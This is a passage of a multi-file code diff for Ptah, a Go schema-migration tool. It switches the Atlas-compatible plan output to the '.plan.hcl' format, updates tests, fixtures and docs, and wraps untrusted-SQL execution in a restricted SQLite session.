-			"pass --save or --output <path> to write a local plan file, or --dry-run to preview the plan document")
 	}
 	if strings.ContainsAny(opts.name, `/\`) {
 		return fmt.Errorf("--name must not contain path separators; use --output to choose the plan file location")
@@ -232,7 +258,6 @@ func rejectUnimplementedAtlasSchemaPlanFlags(cmd *cobra.Command, opts atlasSchem
 		{"push", "plan push targets the Atlas Registry (Atlas Cloud); Ptah's local plan workflow saves plan files with --save or --output instead"},
 		{"pending", "pending plans are an Atlas Registry approval state; a locally saved plan file is approved by operator review"},
 		{"repo", "schema repositories exist only in the Atlas Registry (Atlas Cloud); Ptah plans are local files"},
-		{"auto-approve", "plan approval is an Atlas Registry state; a locally saved plan file is approved by operator review, so there is no approval prompt to skip"},
 		{"edit", "Ptah does not implement editing the plan before saving yet; review the saved plan file instead"},
 		{"skip-lint", "Ptah does not lint declarative plans yet, so there is no lint step to skip"},
 		{"format", "Ptah does not implement --format for schema plan yet"},

--- a/cmd/atlas/schema_plan_test.go
+++ b/cmd/atlas/schema_plan_test.go
@@ -3,7 +3,6 @@ package atlas_test
 import (
 	"bytes"
 	"context"
-	"encoding/json"
 	"os"
 	"path/filepath"
 	"testing"
@@ -86,16 +85,21 @@ func TestSchemaPlanSaveUsesDerivedDefaultFileName(t *testing.T) {
 		"--save",
 	)
 
-	// --save without --output writes <name>.plan.json in the working
-	// directory, with the deterministic fingerprint-derived default name.
+	// --save without --output writes <name>.plan.hcl in the working
+	// directory: the compat tree defaults to the Atlas plan format with the
+	// Atlas-style timestamp name.
 	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
-	matches, globErr := filepath.Glob("plan_*.plan.json")
+	matches, globErr := filepath.Glob("*.plan.hcl")
 	c.Assert(globErr, qt.IsNil)
 	c.Assert(matches, qt.HasLen, 1)
+	c.Assert(matches[0], qt.Matches, `\d{14}\.plan\.hcl`)
 	c.Assert(out, qt.Contains, "Plan saved to file://"+matches[0])
-	plan, err := atlasschema.ReadPlanFile(matches[0])
+	plan, format, err := atlasschema.ReadPlanDocument(matches[0])
 	c.Assert(err, qt.IsNil)
-	c.Assert(plan.Name+atlasschema.PlanFileSuffix, qt.Equals, matches[0])
+	c.Assert(format, qt.Equals, atlasschema.PlanFormatHCL)
+	c.Assert(plan.Name+atlasschema.PlanFileSuffixHCL, qt.Equals, matches[0])
+	c.Assert(atlasschema.IsNativeFingerprint(plan.FromFingerprint), qt.IsTrue)
+	c.Assert(atlasschema.IsNativeFingerprint(plan.ToFingerprint), qt.IsTrue)
 }
 
 func TestSchemaPlanCustomNameIsRecordedAndUsedAsFileName(t *testing.T) {
@@ -113,9 +117,10 @@ func TestSchemaPlanCustomNameIsRecordedAndUsedAsFileName(t *testing.T) {
 	)
 
 	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
-	c.Assert(out, qt.Contains, "Plan saved to file://add_named_users.plan.json")
-	plan, err := atlasschema.ReadPlanFile("add_named_users.plan.json")
+	c.Assert(out, qt.Contains, "Plan saved to file://add_named_users.plan.hcl")
+	plan, format, err := atlasschema.ReadPlanDocument("add_named_users.plan.hcl")
 	c.Assert(err, qt.IsNil)
+	c.Assert(format, qt.Equals, atlasschema.PlanFormatHCL)
 	c.Assert(plan.Name, qt.Equals, "add_named_users")
 }
 
@@ -160,15 +165,29 @@ func TestSchemaPlanDryRunPrintsPlanDocumentWithoutSaving(t *testing.T) {
 		"--dry-run",
 	)
 
-	// --dry-run prints exactly the plan document that --save would write.
+	// --dry-run prints exactly the plan document that --save would write —
+	// the Atlas .plan.hcl shape by default.
 	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
-	var plan atlasschema.PlanFile
-	c.Assert(json.Unmarshal([]byte(out), &plan), qt.IsNil)
-	c.Assert(plan.FormatVersion, qt.Equals, atlasschema.PlanFormatVersion)
+	plan := parsePlanDocumentOutput(c, out)
 	c.Assert(plan.Statements, qt.HasLen, 1)
-	matches, globErr := filepath.Glob("*.plan.json")
-	c.Assert(globErr, qt.IsNil)
-	c.Assert(matches, qt.HasLen, 0)
+	c.Assert(plan.Statements[0].SQL, qt.Contains, `CREATE TABLE "dry_users"`)
+	for _, pattern := range []string{"*.plan.json", "*.plan.hcl"} {
+		matches, globErr := filepath.Glob(pattern)
+		c.Assert(globErr, qt.IsNil)
+		c.Assert(matches, qt.HasLen, 0)
+	}
+}
+
+// parsePlanDocumentOutput round-trips printed plan-document output through
+// the plan reader, asserting it is a valid Atlas-format plan document.
+func parsePlanDocumentOutput(c *qt.C, out string) atlasschema.PlanFile {
+	c.Helper()
+	path := filepath.Join(c.TB.TempDir(), "stdout.plan.hcl")
+	c.Assert(os.WriteFile(path, []byte(out), 0o600), qt.IsNil)
+	plan, format, err := atlasschema.ReadPlanDocument(path)
+	c.Assert(err, qt.IsNil)
+	c.Assert(format, qt.Equals, atlasschema.PlanFormatHCL)
+	return plan
 }
 
 func TestSchemaPlanSyncedSchemaWritesNothing(t *testing.T) {
@@ -193,21 +212,74 @@ func TestSchemaPlanSyncedSchemaWritesNothing(t *testing.T) {
 	c.Assert(os.IsNotExist(statErr), qt.IsTrue)
 }
 
-func TestSchemaPlanRequiresSaveOutputOrDryRun(t *testing.T) {
+func TestSchemaPlanWithoutSavePrintsPlanDocument(t *testing.T) {
 	c := qt.New(t)
 	dir := t.TempDir()
-	schemaPath := filepath.Join(dir, "schema.sql")
-	c.Assert(os.WriteFile(schemaPath, []byte(`CREATE TABLE u (id INTEGER PRIMARY KEY);`), 0o600), qt.IsNil)
+	t.Chdir(dir)
+	dbPath := filepath.Join(dir, "plan-stdout.db")
+	c.Assert(os.WriteFile("schema.sql", []byte(`CREATE TABLE stdout_users (id INTEGER PRIMARY KEY);`), 0o600), qt.IsNil)
 
 	out, err := runSchemaPlan(atlas.NewCompatCommand("atlas"),
-		"--from", "sqlite://"+filepath.Join(dir, "plan.db"),
-		"--to", "file://"+schemaPath,
+		"--from", "sqlite://"+dbPath,
+		"--to", "file://schema.sql",
 	)
 
-	// Atlas pushes an unsaved plan to its registry; Ptah has none, so the
-	// output selection must be explicit instead of silently defaulting.
-	c.Assert(err, qt.ErrorMatches, `atlas schema plan pushes unsaved plans to the Atlas Registry.*pass --save or --output <path>.*or --dry-run.*`)
-	c.Assert(out, qt.Contains, "error: atlas schema plan pushes unsaved plans")
+	// Without --save/--output/--dry-run the plan document prints to stdout
+	// like Atlas printing the computed plan, and no file is written.
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
+	plan := parsePlanDocumentOutput(c, out)
+	c.Assert(plan.Statements, qt.HasLen, 1)
+	c.Assert(plan.Statements[0].SQL, qt.Contains, `CREATE TABLE "stdout_users"`)
+	for _, pattern := range []string{"*.plan.json", "*.plan.hcl"} {
+		matches, globErr := filepath.Glob(pattern)
+		c.Assert(globErr, qt.IsNil)
+		c.Assert(matches, qt.HasLen, 0)
+	}
+}
+
+func TestSchemaPlanAcceptsAutoApprove(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "plan-approve.db")
+	schemaPath := filepath.Join(dir, "schema.sql")
+	planPath := filepath.Join(dir, "p.plan.json")
+	c.Assert(os.WriteFile(schemaPath, []byte(`CREATE TABLE approve_users (id INTEGER PRIMARY KEY);`), 0o600), qt.IsNil)
+
+	// The exact invocation shape measured against the licensed Atlas binary:
+	// plan --from --to --save --output --auto-approve. --auto-approve is
+	// accepted (there is no local approval prompt to skip) and the .json
+	// output path keeps the native JSON plan format.
+	out, err := runSchemaPlan(atlas.NewCompatCommand("atlas"),
+		"--from", "sqlite://"+dbPath,
+		"--to", "file://"+schemaPath,
+		"--save", "--output", planPath,
+		"--auto-approve",
+	)
+
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
+	c.Assert(out, qt.Contains, "Plan saved to file://"+planPath)
+	plan, err := atlasschema.ReadPlanFile(planPath)
+	c.Assert(err, qt.IsNil)
+	c.Assert(plan.FormatVersion, qt.Equals, atlasschema.PlanFormatVersion)
+}
+
+func TestSchemaPlanHCLOutputRejectsExclude(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "plan-exclude.db")
+	schemaPath := filepath.Join(dir, "schema.sql")
+	c.Assert(os.WriteFile(schemaPath, []byte(`CREATE TABLE exclude_users (id INTEGER PRIMARY KEY);`), 0o600), qt.IsNil)
+
+	_, err := runSchemaPlan(atlas.NewCompatCommand("atlas"),
+		"--from", "sqlite://"+dbPath,
+		"--to", "file://"+schemaPath,
+		"--exclude", "zzz_unrelated",
+		"--save", "--output", filepath.Join(dir, "x.plan.hcl"),
+	)
+
+	// The Atlas plan shape has no exclude field, and silently dropping the
+	// patterns would break apply-time fingerprint verification.
+	c.Assert(err, qt.ErrorMatches, `the Atlas \.plan\.hcl format has no field for exclude patterns.*`)
 }
 
 func TestSchemaPlanRejectsNonDatabaseFrom(t *testing.T) {
@@ -296,11 +368,6 @@ func TestSchemaPlanRejectsUnimplementedAtlasFlags(t *testing.T) {
 			name: "repo",
 			args: []string{"--repo", "atlas://plans"},
 			want: `atlas schema plan accepts --repo, but schema repositories exist only in the Atlas Registry \(Atlas Cloud\); Ptah plans are local files`,
-		},
-		{
-			name: "auto_approve",
-			args: []string{"--auto-approve"},
-			want: `atlas schema plan accepts --auto-approve, but plan approval is an Atlas Registry state; a locally saved plan file is approved by operator review, so there is no approval prompt to skip`,
 		},
 		{
 			name: "edit",

--- a/cmd/atlas/testdata/atlas-plan-desired.sql
+++ b/cmd/atlas/testdata/atlas-plan-desired.sql
@@ -1,0 +1,13 @@
+-- desired state for schema-plan-file scenario
+CREATE TABLE `users` (
+  `id` integer NOT NULL PRIMARY KEY AUTOINCREMENT,
+  `name` text NOT NULL,
+  `email` text NULL
+);
+CREATE TABLE `posts` (
+  `id` integer NOT NULL PRIMARY KEY AUTOINCREMENT,
+  `user_id` integer NOT NULL,
+  `title` text NOT NULL,
+  CONSTRAINT `fk_posts_user` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`)
+);
+CREATE INDEX `idx_posts_user_id` ON `posts` (`user_id`);

--- a/cmd/atlas/testdata/atlas.plan.hcl
+++ b/cmd/atlas/testdata/atlas.plan.hcl
@@ -1,0 +1,17 @@
+plan "20260801102801" {
+  from      = "2Avyplv6jw8kAsH/g2YFPkfnp+UNBpomMXPUl/4R4+Q="
+  to        = "YEugbm2aJqmXFA8dDrzmqLPC4tiNUrXe6YCrvazKOiY="
+  migration = <<-SQL
+  -- Add column "email" to table: "users"
+  ALTER TABLE `users` ADD COLUMN `email` text NULL;
+  -- Create "posts" table
+  CREATE TABLE `posts` (
+    `id` integer NOT NULL PRIMARY KEY AUTOINCREMENT,
+    `user_id` integer NOT NULL,
+    `title` text NOT NULL,
+    CONSTRAINT `fk_posts_user` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON UPDATE NO ACTION ON DELETE NO ACTION
+  );
+  -- Create index "idx_posts_user_id" to table: "posts"
+  CREATE INDEX `idx_posts_user_id` ON `posts` (`user_id`);
+  SQL
+}

--- a/cmd/schema/apply_test.go
+++ b/cmd/schema/apply_test.go
@@ -236,6 +236,38 @@ func TestSchemaApplyPlanFileExecutesAndRefusesStaleTarget(t *testing.T) {
 	c.Assert(listSQLiteTables(c, dbPath), qt.DeepEquals, []string{"orders", "users"})
 }
 
+// TestSchemaApplyPlanFileRejectsAtlasHCLPlanByName pins the native tree's
+// half of the interoperability contract: the native plan format stays JSON,
+// but handing it an Atlas `.plan.hcl` must name the command that does read it
+// instead of leaking a JSON decoder complaint about the letter 'p' — the
+// exact defect the compat campaign filed.
+func TestSchemaApplyPlanFileRejectsAtlasHCLPlanByName(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "target.db")
+	planPath := filepath.Join(dir, "atlas.plan.hcl")
+	seedSQLite(c, dbPath, "CREATE TABLE users (id INTEGER PRIMARY KEY);")
+	c.Assert(os.WriteFile(planPath, []byte(
+		"plan \"20260801102801\" {\n"+
+			"  from      = \"2Avyplv6jw8kAsH/g2YFPkfnp+UNBpomMXPUl/4R4+Q=\"\n"+
+			"  to        = \"YEugbm2aJqmXFA8dDrzmqLPC4tiNUrXe6YCrvazKOiY=\"\n"+
+			"  migration = <<-SQL\n  CREATE TABLE `posts` (`id` integer);\n  SQL\n}\n",
+	), 0o600), qt.IsNil)
+
+	out, err := runSchema("", "apply",
+		"--db-url", "sqlite://"+dbPath,
+		"--plan", planPath,
+		"--auto-approve",
+	)
+
+	c.Assert(err, qt.ErrorMatches,
+		`plan file .* is in the Atlas \.plan\.hcl format, which the native .ptah schema apply --plan. does not read; `+
+			`apply it with .ptah-compat schema apply --plan file://.* --to <desired state>., `+
+			`or produce a native plan with .ptah schema plan --output <name>\.plan\.json.`)
+	c.Assert(out, qt.Not(qt.Contains), "invalid character")
+	c.Assert(listSQLiteTables(c, dbPath), qt.DeepEquals, []string{"users"})
+}
+
 func TestSchemaApplyPlanRejectsConflictingFlags(t *testing.T) {
 	c := qt.New(t)
 	dir := t.TempDir()

--- a/dbschema/connection.go
+++ b/dbschema/connection.go
@@ -351,26 +351,49 @@ func (dc *DatabaseConnection) ExecContext(ctx context.Context, query string, arg
 	return dc.sqlRunner().ExecContext(ctx, query, args...)
 }
 
-// RestrictSQLiteSession applies engine-level restrictions to a SQLite session
-// pinned by [DatabaseConnection.WithSession]: ATTACH, DETACH, and VACUUM INTO
-// are refused by the engine itself, so SQL executed on the session cannot
-// reach another database file or write to an arbitrary filesystem path.
+// WithUntrustedSQLSession pins a session that will execute SQL the caller does
+// not trust, applying and verifying every engine-level restriction the dialect
+// supports before the callback runs.
 //
-// It is meant for throwaway databases that execute untrusted SQL — a dev
-// database a plan file is rehearsed on. The restriction is a property of the
-// physical connection, so it applies only to a pinned session and returns an
-// error otherwise; it also verifies that the restriction took effect rather
-// than assuming it, so a silent failure is impossible. Non-SQLite dialects
-// have no equivalent and return an error.
-func (dc *DatabaseConnection) RestrictSQLiteSession(ctx context.Context) error {
+// Use it instead of [DatabaseConnection.WithSession] whenever the statements
+// come from somewhere outside the operator's own project — a plan file
+// received from another tool, for example. Because the restrictions are
+// properties of the physical connection, applying them anywhere other than the
+// pinned session would silently protect nothing; taking the session and the
+// restrictions in one step is what makes that mistake unrepresentable.
+//
+// What the restrictions buy depends on the dialect. On SQLite the engine
+// refuses ATTACH, DETACH, and VACUUM INTO, so the callback's SQL cannot reach
+// another database file or write a database copy to an arbitrary path, and
+// native extensions cannot be loaded; the restriction is verified to be in
+// force before the callback runs. Storage-directory pragmas are not covered.
+// Other dialects have no equivalent session-level control, so the callback
+// runs unrestricted — on those, only the caller's own review of the SQL and
+// the disposability of the database stand between it and the statements.
+func (dc *DatabaseConnection) WithUntrustedSQLSession(
+	ctx context.Context,
+	use func(*DatabaseConnection) error,
+) error {
 	if dc == nil {
-		return fmt.Errorf("sqlite session restriction requires an open database connection")
+		return fmt.Errorf("untrusted SQL session requires an open database connection")
+	}
+	return dc.WithSession(ctx, func(session *DatabaseConnection) error {
+		if err := session.restrictUntrustedSQL(ctx); err != nil {
+			return err
+		}
+		return use(session)
+	})
+}
+
+// restrictUntrustedSQL applies the engine-level restrictions available for the
+// pinned session's dialect. Dialects without such controls are a no-op, which
+// WithUntrustedSQLSession documents.
+func (dc *DatabaseConnection) restrictUntrustedSQL(ctx context.Context) error {
+	if !dc.pinned || dc.session == nil {
+		return fmt.Errorf("untrusted SQL restrictions require a pinned session")
 	}
 	if platform.NormalizeDialect(dc.info.Dialect) != platform.SQLite {
-		return fmt.Errorf("sqlite session restriction does not apply to dialect %q", dc.info.Dialect)
-	}
-	if !dc.pinned || dc.session == nil {
-		return fmt.Errorf("sqlite session restriction requires a pinned session; call it inside WithSession")
+		return nil
 	}
 	return sqlite.RestrictSession(ctx, dc.session)
 }

--- a/dbschema/connection.go
+++ b/dbschema/connection.go
@@ -193,6 +193,10 @@ type DatabaseConnection struct {
 	newReader schemaReaderFactory
 	newWriter schemaWriterFactory
 	pinned    bool
+	// session is the pinned physical session set by WithSession. Connection
+	// state that only applies per physical connection — see
+	// RestrictSQLiteSession — needs it.
+	session *sql.Conn
 }
 
 type schemaReaderFactory func(sqlrunner.Runner) types.SchemaReader
@@ -304,6 +308,7 @@ func (dc *DatabaseConnection) WithSession(
 	scoped.writer = dc.newWriter(runner, session)
 	scoped.executor = nil
 	scoped.pinned = true
+	scoped.session = session
 	if dc.writer != nil && dc.writer.IsDryRun() {
 		scoped.writer.SetDryRun(true)
 	}
@@ -344,6 +349,30 @@ func (dc *DatabaseConnection) ExecContext(ctx context.Context, query string, arg
 		return executor.ExecContext(ctx, query, args...)
 	}
 	return dc.sqlRunner().ExecContext(ctx, query, args...)
+}
+
+// RestrictSQLiteSession applies engine-level restrictions to a SQLite session
+// pinned by [DatabaseConnection.WithSession]: ATTACH, DETACH, and VACUUM INTO
+// are refused by the engine itself, so SQL executed on the session cannot
+// reach another database file or write to an arbitrary filesystem path.
+//
+// It is meant for throwaway databases that execute untrusted SQL — a dev
+// database a plan file is rehearsed on. The restriction is a property of the
+// physical connection, so it applies only to a pinned session and returns an
+// error otherwise; it also verifies that the restriction took effect rather
+// than assuming it, so a silent failure is impossible. Non-SQLite dialects
+// have no equivalent and return an error.
+func (dc *DatabaseConnection) RestrictSQLiteSession(ctx context.Context) error {
+	if dc == nil {
+		return fmt.Errorf("sqlite session restriction requires an open database connection")
+	}
+	if platform.NormalizeDialect(dc.info.Dialect) != platform.SQLite {
+		return fmt.Errorf("sqlite session restriction does not apply to dialect %q", dc.info.Dialect)
+	}
+	if !dc.pinned || dc.session == nil {
+		return fmt.Errorf("sqlite session restriction requires a pinned session; call it inside WithSession")
+	}
+	return sqlite.RestrictSession(ctx, dc.session)
 }
 
 // Conn returns a dedicated database session. Callers that use session-scoped

--- a/dbschema/connection.go
+++ b/dbschema/connection.go
@@ -195,7 +195,7 @@ type DatabaseConnection struct {
 	pinned    bool
 	// session is the pinned physical session set by WithSession. Connection
 	// state that only applies per physical connection — see
-	// RestrictSQLiteSession — needs it.
+	// WithUntrustedSQLSession — needs it.
 	session *sql.Conn
 }
 
@@ -376,6 +376,11 @@ func (dc *DatabaseConnection) WithUntrustedSQLSession(
 ) error {
 	if dc == nil {
 		return fmt.Errorf("untrusted SQL session requires an open database connection")
+	}
+	// WithSession's own nil check never sees the caller's callback, because
+	// the one handed to it below is this method's closure.
+	if use == nil {
+		return fmt.Errorf("database session callback is nil")
 	}
 	return dc.WithSession(ctx, func(session *DatabaseConnection) error {
 		if err := session.restrictUntrustedSQL(ctx); err != nil {

--- a/docs/public_api.md
+++ b/docs/public_api.md
@@ -87,14 +87,23 @@ Use it when session-local state must remain consistent across cleanup, replay,
 introspection, and verification. The scoped connection must not escape the
 callback.
 
-`dbschema.DatabaseConnection.RestrictSQLiteSession` restricts a pinned SQLite
-session at the engine level: `ATTACH`, `DETACH`, and `VACUUM INTO` are refused
-by SQLite itself, so SQL executed on the session cannot reach another database
-file or write to an arbitrary path. Use it for throwaway databases that
-execute untrusted SQL, such as a dev database a plan file is rehearsed on. The
-restriction is a property of the physical connection, so it requires a session
-pinned by `WithSession` and verifies that it took effect rather than assuming
-it; non-SQLite dialects return an error.
+`dbschema.DatabaseConnection.WithUntrustedSQLSession` pins a session that will
+execute SQL the caller does not trust and applies every engine-level
+restriction the dialect supports before the callback runs. Use it instead of
+`WithSession` whenever the statements come from outside the operator's own
+project, such as a plan file produced by another tool.
+
+- On SQLite the engine refuses `ATTACH`, `DETACH`, and `VACUUM INTO`, so the
+  callback's SQL cannot reach another database file or write a database copy
+  to an arbitrary path, and extensions cannot be loaded. The restriction is
+  verified to be in force before the callback runs.
+- Storage-directory pragmas and `writable_schema` are not covered.
+- Other dialects have no equivalent session-level control and run
+  unrestricted.
+
+Taking the session and the restrictions in one step is deliberate: the
+restrictions are properties of the physical session, so applying them
+separately would silently protect nothing.
 
 `migration/generator.PlanMigration` performs loading, diff planning, safety
 checks, and optional shadow verification without publishing files. Its

--- a/docs/public_api.md
+++ b/docs/public_api.md
@@ -87,6 +87,15 @@ Use it when session-local state must remain consistent across cleanup, replay,
 introspection, and verification. The scoped connection must not escape the
 callback.
 
+`dbschema.DatabaseConnection.RestrictSQLiteSession` restricts a pinned SQLite
+session at the engine level: `ATTACH`, `DETACH`, and `VACUUM INTO` are refused
+by SQLite itself, so SQL executed on the session cannot reach another database
+file or write to an arbitrary path. Use it for throwaway databases that
+execute untrusted SQL, such as a dev database a plan file is rehearsed on. The
+restriction is a property of the physical connection, so it requires a session
+pinned by `WithSession` and verifies that it took effect rather than assuming
+it; non-SQLite dialects return an error.
+
 `migration/generator.PlanMigration` performs loading, diff planning, safety
 checks, and optional shadow verification without publishing files. Its
 `MigrationPlan.WriteFiles` method publishes the validated artifacts once. The

--- a/docs/public_api.snapshot
+++ b/docs/public_api.snapshot
@@ -4992,6 +4992,7 @@ func (dc *DatabaseConnection) QueryRow(query string, args ...any) *sql.Row
 func (dc *DatabaseConnection) QueryRowContext(ctx context.Context, query string, args ...any) *sql.Row
 func (dc *DatabaseConnection) Reader() types.SchemaReader
 func (dc *DatabaseConnection) ResolveIdentifierSemantics(ctx context.Context, names []string) (identifier.Semantics, error)
+func (dc *DatabaseConnection) RestrictSQLiteSession(ctx context.Context) error
 func (dc *DatabaseConnection) SchemaWriter() types.SchemaWriter
 func (dc *DatabaseConnection) WithExecutor(executor types.SchemaExecutor) *DatabaseConnection
 func (dc *DatabaseConnection) WithSession(ctx context.Context, use func(*DatabaseConnection) error) (resultErr error)

--- a/docs/public_api.snapshot
+++ b/docs/public_api.snapshot
@@ -4992,10 +4992,10 @@ func (dc *DatabaseConnection) QueryRow(query string, args ...any) *sql.Row
 func (dc *DatabaseConnection) QueryRowContext(ctx context.Context, query string, args ...any) *sql.Row
 func (dc *DatabaseConnection) Reader() types.SchemaReader
 func (dc *DatabaseConnection) ResolveIdentifierSemantics(ctx context.Context, names []string) (identifier.Semantics, error)
-func (dc *DatabaseConnection) RestrictSQLiteSession(ctx context.Context) error
 func (dc *DatabaseConnection) SchemaWriter() types.SchemaWriter
 func (dc *DatabaseConnection) WithExecutor(executor types.SchemaExecutor) *DatabaseConnection
 func (dc *DatabaseConnection) WithSession(ctx context.Context, use func(*DatabaseConnection) error) (resultErr error)
+func (dc *DatabaseConnection) WithUntrustedSQLSession(ctx context.Context, use func(*DatabaseConnection) error) error
 func (dc *DatabaseConnection) Writer() types.SchemaExecutor
 
 ## github.com/stokaro/ptah/dbschema/types

--- a/docs/site/scripts/data/feature-matrix-rows.json
+++ b/docs/site/scripts/data/feature-matrix-rows.json
@@ -446,8 +446,8 @@
   "ptah": "yes",
   "atlas_oss": "no",
   "atlas_pro": "yes",
-  "note": "`schema plan` writes a format_version-1 JSON plan with sha256 fingerprints; `apply --plan` refuses a drifted target as stale.",
-  "evidence": "Verified: `schema plan --from sqlite://x.db --to file://new.sql --save --output p.plan.json`, then `schema apply --plan file://p.plan.json`; cli-surface.md `atlas schema plan`"
+  "note": "`schema plan` writes Atlas `.plan.hcl` by default (`.json` keeps the native plan); `apply --plan` reads both, Atlas-authored included, verified by replay against `--to` plus an end-state check.",
+  "evidence": "Fixed by #958 (measured 2026-08-01 against Atlas v1.2.4-e282f76-canary licensed trial: mutual plan-file unreadability, opposite --plan/--to contracts, foreign fingerprints). Verified: `schema apply --url sqlite://b.db --to file://desired.sql --plan file://atlas.plan.hcl --auto-approve` applies the real Atlas-authored oracle plan end to end (cmd/atlas/schema_apply_planhcl_test.go); `schema plan --from sqlite://x.db --to file://new.sql --output x.plan.hcl` round-trips; internal/atlasschema/testdata/atlas.plan.hcl is the licensed binary's artifact. Ptah-written `.plan.hcl` parses in Atlas's reader but its sha256 fingerprints cannot satisfy Atlas's own hash verification (no local recipe, either direction)."
  },
  {
   "area": "Declarative / direct schema workflow",

--- a/docs/site/src/content/docs/atlas/comparison.md
+++ b/docs/site/src/content/docs/atlas/comparison.md
@@ -606,11 +606,11 @@ The registry-bound `--to-tag`, `--skip-checks`, and `--plan` flags are recorded 
 
 **Type.** Product behavior
 
-**Current boundary.** `ptah-compat schema plan` computes the declarative migration from the `--from` target database to local `--to` schema files and saves it as a local JSON plan file with ordered statements, per-statement safety severity, dialect, exclude patterns, and SHA-256 source/desired fingerprints (`--save`/`--output`/`--name`/`--dry-run`, `--env` project defaults).
+**Current boundary.** `ptah-compat schema plan` computes the declarative migration from the `--from` target database to local `--to` schema files and saves it as a local plan file (`--save`/`--output`/`--name`/`--dry-run`, `--env` project defaults; `--auto-approve` accepted for CLI compatibility). The default format is the Atlas `.plan.hcl` shape, readable by Atlas's plan reader; an `--output` path ending in `.json` writes the native JSON plan with ordered statements, per-statement safety severity, dialect, exclude patterns, and SHA-256 source/desired fingerprints.
 
-`ptah-compat schema apply --plan file://<path>` executes exactly the saved statements after verifying the source fingerprint against the live database, refusing drifted targets loudly.
+`ptah-compat schema apply --plan file://<path>` reads both formats, including `.plan.hcl` files written by the licensed Atlas binary. JSON plans execute after verifying the source fingerprint against the live database, refusing drifted targets loudly. Atlas-format plans require `--to` like the official binary and are verified by replaying the plan on a dev database (an ephemeral SQLite one when the target is SQLite) and comparing the reached state with the desired state; every `--plan` apply with a desired state re-verifies the end state on the target afterward.
 
-The registry-bound `--push`, `--pending`, `--repo`, and `--auto-approve` plan flags are recorded waivers; the plan registry sub-verbs stay Atlas CE boundary stubs; `--edit`, `--skip-lint`, `--format`, `--name-format`, and `--directive` fail explicitly until implemented.
+The registry-bound `--push`, `--pending`, and `--repo` plan flags are recorded waivers; the plan registry sub-verbs stay Atlas CE boundary stubs; `--edit`, `--skip-lint`, `--format`, `--name-format`, and `--directive` fail explicitly until implemented.
 
 **Tracking.** [`stokaro/ptah#758`](https://github.com/stokaro/ptah/issues/758)
 
@@ -634,7 +634,7 @@ The registry-bound `--push`, `--pending`, `--repo`, and `--auto-approve` plan fl
 
 `migrate down --dev-url` now verifies the rollback plan on the dev database before the target is touched, and `migrate down --format` renders an Atlas Go-template down report; `migrate down --to-tag`, `--skip-checks`, and `--plan` are recorded registry-bound waivers that fail loudly with their rationale.
 
-`schema apply --edit`, `migrate diff --edit`, and `migrate new --edit` now open the operator's `$VISUAL`/`$EDITOR`. `schema apply --plan file://<path>` executes a pre-approved local plan file saved by `schema plan` after verifying the target's schema fingerprint; registry `atlas://` plan URLs are rejected.
+`schema apply --edit`, `migrate diff --edit`, and `migrate new --edit` now open the operator's `$VISUAL`/`$EDITOR`. `schema apply --plan file://<path>` executes a pre-approved local plan file — the Atlas `.plan.hcl` format or the native JSON plan — after verifying it against the target (fingerprint check, dev-database replay against `--to`, and post-apply end-state verification, per format); registry `atlas://` plan URLs are rejected.
 
 `ptah-compat schema inspect --exclude` now filters inspection output with Atlas-style resource globs and type selectors, including the documented `*[type=extension].version` field selector with schema-qualified globs; other field selectors and type selectors on non-final pattern segments fail explicitly.
 

--- a/docs/site/src/content/docs/atlas/conformance.md
+++ b/docs/site/src/content/docs/atlas/conformance.md
@@ -103,7 +103,7 @@ are triaged in the comparison gap register rather than measured here.
 
 **Native Ptah.** Ptah plans and applies declarative schema changes through the same engine that powers `schema apply`
 
-**Atlas-compatible Ptah surface.** `ptah-compat schema plan` saves the computed plan to a fingerprinted local JSON plan file; `ptah-compat schema apply --plan file://<path>` executes the saved statements only after the live database matches the plan's source fingerprint, refusing drifted targets; registry planning flags are recorded waivers and the plan registry sub-verbs stay CE boundary stubs
+**Atlas-compatible Ptah surface.** `ptah-compat schema plan` saves the computed plan in the Atlas `.plan.hcl` format by default (a `.json` output path keeps the native fingerprinted JSON plan); `ptah-compat schema apply --plan file://<path>` reads both formats, Atlas-authored files included — JSON plans execute only after the live database matches the plan's source fingerprint, Atlas-format plans require `--to` and are verified by dev-database replay plus the always-on post-apply end-state check; registry planning flags are recorded waivers and the plan registry sub-verbs stay CE boundary stubs
 
 **Atlas CE.** `schema plan` aborts with the community-version boundary; the plan/approval flow is bound to the Atlas Pro registry
 

--- a/docs/site/src/content/docs/atlas/feature-matrix.md
+++ b/docs/site/src/content/docs/atlas/feature-matrix.md
@@ -140,7 +140,7 @@ as open capabilities regardless.
 | Inspect non-database sources via `--dev-url` | ✅ | ✅ | ✅ | Schema file, `atlas.sum` migration dir, or env:// is materialized on a reset dev DB then introspected; without `--dev-url` it fails. |
 | Inspect split/write file exports | ✅ | ❌ | ✅ | `{{ hcl . \| split \| write "dir" }}` writes object/schema/type trees; pinned Atlas CE rejects split, write, hcl as non-community. |
 | JSON output for native schema diff | ✅ | ❔ | ❔ | Native ptah schema diff `--format` json emits a machine-readable statements document; the Go-template row only states that {{ json . }} fails on the compat diff, leaving native JSON unstated. |
-| Local pre-approved plan files | ✅ | ❌ | ✅ | `schema plan` writes a format_version-1 JSON plan with sha256 fingerprints; `apply --plan` refuses a drifted target as stale. |
+| Local pre-approved plan files | ✅ | ❌ | ✅ | `schema plan` writes Atlas `.plan.hcl` by default (`.json` keeps the native plan); `apply --plan` reads both, Atlas-authored included, verified by replay against `--to` plus an end-state check. |
 | schema apply against a live database | ✅ | ✅ | ✅ | Diffs `--url` against the `--to` desired state, prints the SQL plan, applies after confirmation. Verified end to end on SQLite. |
 | schema clean | 🟡 | ✅ | ✅ | Plan and `--dry-run` list tables (plus PostgreSQL enums/sequences, SQL Server FKs), but the apply drops views too via DropAllTables. |
 | schema diff between two schema states | 🟡 | ✅ | ✅ | SQLite refuses any change needing a table rebuild: column modify, NOT NULL change, constraint add/remove, enum CHECK change. Same on apply. |

--- a/docs/site/src/content/docs/atlas/schema-commands.md
+++ b/docs/site/src/content/docs/atlas/schema-commands.md
